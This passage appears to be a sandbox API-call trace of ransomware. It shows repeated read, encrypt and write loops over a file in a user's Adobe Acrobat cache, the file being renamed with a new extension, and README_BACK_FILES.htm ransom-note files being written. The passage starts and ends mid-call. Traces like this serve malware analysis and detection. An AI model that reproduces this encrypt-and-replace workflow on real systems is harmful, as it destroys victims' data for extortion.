hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.160] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.160] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.161] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.161] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.161] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.161] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.161] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.161] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.161] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.161] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.161] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.161] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.161] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.161] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.161] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.161] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.161] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.161] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.161] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.162] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.162] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.162] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.162] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.162] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.162] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.162] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.162] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.162] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.162] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.162] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.162] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.162] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.163] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.163] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.163] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.163] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.163] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.163] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.163] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.163] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.163] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.163] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.163] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.163] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.163] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.163] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.163] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.164] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.164] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.164] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.164] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.164] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.164] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.164] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.164] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.164] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.164] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.164] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.164] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.164] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.164] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.164] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.165] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.165] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.165] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.165] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.165] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.165] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.165] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.165] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.165] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.165] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.165] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.165] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.165] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.165] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.165] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.166] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.166] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.166] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.166] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.166] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.166] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x2b5, lpOverlapped=0x0) returned 1 [0242.166] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x2b5, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x2c0) returned 1 [0242.166] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x2c0, lpOverlapped=0x0) returned 1 [0242.166] CloseHandle (hObject=0x5d40) returned 1 [0242.166] CloseHandle (hObject=0x5d44) returned 1 [0242.169] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\UserCache.bin.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\usercache.bin.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\UserCache.bin" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\usercache.bin"), bFailIfExists=0) returned 1 [0242.183] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\UserCache.bin", dwFileAttributes=0x0) returned 1 [0242.184] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\UserCache.bin.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\usercache.bin.gsg")) returned 1 [0242.185] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\UserCache.bin" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\usercache.bin"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\UserCache.bin.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\usercache.bin.fuck")) returned 1 [0242.186] CryptDestroyHash (hHash=0x28bf018) returned 1 [0242.186] CryptDestroyKey (hKey=0x28bf1d8) returned 1 [0242.186] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0242.186] FindNextFileA (in: hFindFile=0x28e7d78, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0242.186] FindClose (in: hFindFile=0x28e7d78 | out: hFindFile=0x28e7d78) returned 1 [0242.186] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\readme_back_files.htm")) returned 0xffffffff [0242.187] AreFileApisANSI () returned 1 [0242.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6f80, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0242.187] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0242.187] GetFileType (hFile=0x5d3c) returned 0x1 [0242.187] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0242.188] FindNextFileA (in: hFindFile=0x28e7978, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0242.188] FindClose (in: hFindFile=0x28e7978 | out: hFindFile=0x28e7978) returned 1 [0242.189] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\readme_back_files.htm")) returned 0xffffffff [0242.189] AreFileApisANSI () returned 1 [0242.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6a58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0242.189] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, 